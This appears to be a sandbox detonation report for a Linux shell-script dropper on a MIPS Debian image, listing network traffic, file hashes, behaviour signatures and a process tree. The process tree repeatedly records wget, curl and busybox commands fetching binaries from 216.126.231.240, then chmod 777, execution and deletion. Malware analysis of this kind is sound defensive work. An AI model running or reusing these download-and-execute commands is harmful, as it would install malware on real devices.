/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 03:52

Reported

2024-11-20 03:54

Platform

debian9-mipsel-20240611-en

Max time kernel

104s

Max time network

134s

Command Line

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A

Processes

/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

